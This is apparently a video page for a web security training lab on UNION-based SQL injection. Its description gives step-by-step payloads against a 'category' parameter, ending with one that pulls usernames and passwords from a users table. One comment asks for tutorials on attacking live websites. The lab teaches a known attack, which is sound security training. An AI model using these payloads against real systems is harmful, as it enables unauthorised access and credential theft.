SQL injection UNION attack, retrieving multiple values in a single column

preview_player
Показать описание
# Solution:
/filter?catagory='UNION+SELECT+NULL,NULL--'
- to determine the number of columns and which contain data.
- verify the the two columns and figure out which one contains text.
- its the second one

```
GET /filter?category='UNION+SELECT+NULL,'bbbb'--

```
```
GET /filter?category='UNION+SELECT+NULL,username||+'~'||password+FROM+users--
```
Рекомендации по теме
Комментарии
Автор

I didn't know bots felt loneliness

knundrum
Автор

Please make beginner 2 advance level practical live website bug hunting, live website penetration testing, live website exploitation content video series...
🙏 😊 💯✌❤💚💙💜😍😘🤝

Free.Education
visit shbcf.ru